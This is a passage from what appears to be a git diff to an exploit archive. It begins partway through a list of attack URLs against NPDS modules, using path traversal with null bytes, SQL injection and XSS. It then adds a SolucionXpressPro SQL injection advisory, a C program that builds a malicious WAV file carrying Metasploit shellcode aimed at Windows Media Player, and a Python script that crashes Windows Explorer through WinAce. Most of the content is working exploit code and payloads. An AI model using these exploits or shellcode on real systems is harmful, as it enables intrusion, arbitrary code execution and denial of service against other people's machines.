& Include + + http:/www.example.com/npds/modules/G-annonces/admin/?ModPath=../../../../../../npds/index.php%00&table_cat=`test_hack_npds`%20(%20id_cat%20mediumint(11)%20NOT +%20NULL%20auto_increment,%20categorie%20int(3)%20NOT%20NULL%20default%201,%20KEY%20id%20(id_cat))/* +/npds/modules/G-annonces/admin/index.php +SQL Inject & Include + + http:/www.example.com/npds/modules/G-annonces/annonce_form.php?ModPath=../../../logs/security.log%00 +/npds/modules/G-annonces/annonce_form.php +SQL Inject & Include + + XSS non permanent +/npds/modules/annonces/affi_ann.php +XSS + + XSS non permanent +/npds/modules/annonces/affiche.php +XSS + + http:/www.example.com/npds/modules/G-annonces/admin/adm_ann.php?mess_acc=%3Cscript>alert("test");%3C/script> +/npds/modules/G-annonces/admin/adm_ann.php +XSS + + http:/www.example.com/npds/modules/G-annonces/admin/adm_cat.php?mess_acc=%3Cscript>alert("test");%3C/script> +/npds/modules/G-annonces/admin/adm_cat.php +XSS + + http:/www.example.com/npds/modules/G-annonces/annonce_form.php?mess_acc=%3Cscript>alert('test');%3C/script> +/npds/modules/G-annonces/annonce_form.php +XSS + +http:/www.example.com/npds/modules/G-annonces/index.php?mess_acc=%3Cscript>alert('test');%3C/script> +/npds/modules/G-annonces/index.php +XSS + + http:/www.example.com/npds/modules/G-annonces/list_ann.php?mess_acc=%3Cscript>alert('test');%3C/script> +/npds/modules/G-annonces/list_ann.php +XSS + + http:/www.example.com/npds/modules/G-annonces/modif_ann.php?mess_acc=%3Cscript>alert('test');%3C/script> +/npds/modules/G-annonces/modif_ann.php +XSS + + http:/www.example.com/npds/modules/G-annonces/search.php?mess_acc=%3Cscript>alert('test'); +/npds/modules/G-annonces/search.php +XSS + + http:/www.example.com/npds/modules/G-annonces/admin/index.php?mess_acc=%3Cscript>alert("test");%3C/script> +/npds/modules/GS-annonces/admin/index.php +XSS + + http:/www.example.com/npds/modules/Top10/top10.php?bgcolor2=green"> +/npds/modules/Top10/top10.php +XSS + + http:/www.example.com/npds/themes/npds2004/footer.php?theme="> +/npds/themes/npds2004/footer.php +XSS + diff --git a/platforms/php/webapps/32698.txt b/platforms/php/webapps/32698.txt new file mode 100755 index 000000000..5882d29ce --- /dev/null +++ b/platforms/php/webapps/32698.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/33111/info + +SolucionXpressPro is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/main.php?id_area=[SQL] \ No newline at end of file diff --git a/platforms/windows/remote/32684.c b/platforms/windows/remote/32684.c new file mode 100755 index 000000000..922a17411 --- /dev/null +++ b/platforms/windows/remote/32684.c @@ -0,0 +1,51 @@ +source: http://www.securityfocus.com/bid/33042/info + +Microsoft Windows Media Player is prone to a code-execution vulnerability. + +An attacker can exploit this issue by tricking an unsuspecting victim into opening a malicious file with the vulnerable application. A successful exploit will allow arbitrary code to run in the context of the user running the application. + +#include + +int main() +{ +/* win32_exec - EXITFUNC=process CMD=calc.exe Size=138 Encoder=None http://metasploit.com */ +unsigned char scode[] = +"\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b" +"\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99" +"\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x04" +"\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb" +"\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\x04\xc3\x31\xc0\x64\x8b\x40\x30" +"\x85\xc0\x78\x0c\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\xeb\x09" +"\x8b\x80\xb0\x00\x00\x00\x8b\x68\x3c\x5f\x31\xf6\x60\x56\x89\xf8" +"\x83\xc0\x7b\x50\x68\x7e\xd8\xe2\x73\x68\x98\xfe\x8a\x0e\x57\xff" +"\xe7\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"; + +unsigned char begincode[] = +"\x52\x49\x46\x46\x04\x44\x0E\x01\x57\x41\x56\x45\x66\x6D\x74\x20" +"\x28\x00\x00\x00\xFE\xFF\x02\x00\x00\xEE\x02\x00\x00\x94\x11\x00" +"\x06\x00\x18\x00\x16\x00\x18\x00\x00\x00\x00\x00\x01\x00\x00\x00" +"\x00\x00\x10\x00\x80\x00\x00\xAA\x00\x38\x9B\x71\x64\x61\x74\x61" +"\xC8\x43\x0E\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00"; + + FILE *f; + f = _fsopen("new.wav", "w+", 0); + fwrite(begincode, sizeof(scode), 1, f); + for (int i=0; i<20000; i++) + fwrite(scode, sizeof(scode), 1, f); + fclose(f); + return 0; +} diff --git a/platforms/windows/remote/32688.py b/platforms/windows/remote/32688.py new file mode 100755 index 000000000..4d8a38594 --- /dev/null +++ b/platforms/windows/remote/32688.py @@ -0,0 +1,66 @@ +source: http://www.securityfocus.com/bid/33049/info + +Winace is prone to a denial-of-service vulnerability. + +Attackers can exploit this issue to crash Windows Explorer, denying service to legitimate users. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed. + +Winace 2.2 is vulnerable; other versions may also be affected. + +#!/usr/bin/python +##################################### +# Author : +cN4phux +# +# Mail : cN4phux[at]Gmail[dot]com # Proud to be Algerian; # +# Site : N/A (not +yet) # +##################################### +#Greetz to all DZ's : Blub , Knuthy , His0k4 , Djug , Izem , etc . . . +# : Zigma , Heurs etc . . . + +# MS Windows Explorer Unspecified ( WinAce 2.2 ) Denial of Service Exploit +# Magic offset : +# Bug comes from shell32.dll +# EventType : BEX P1 : explorer.exe P2 : 6.0.2900.2180 P3 +: 41107ece +# P4 : shell32.dll P5 : 6.0.2900.2180 P6 : 4125330f P7 : +000e1666 +# P8 : c0000409 P9 : 00000000 +# Just right click the file and move your mouse to( Add to +"AAAAAAAAAAAAAAAAAAAAAAAA. . . .ace" ) with WinAce and you'll see ur +Explorer crashes . +# Successfully tested on Windows XP SP2 FR, +import sys +txt_header = ((("\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41"))); # +txt_title = "\x41"*194 # +ext = ".txt"; +headers = open(txt_title + ext, "w") +headers.write(txt_header) +headers.close() +print "\nFile created successfully !"; +print "\n\cN4phux.";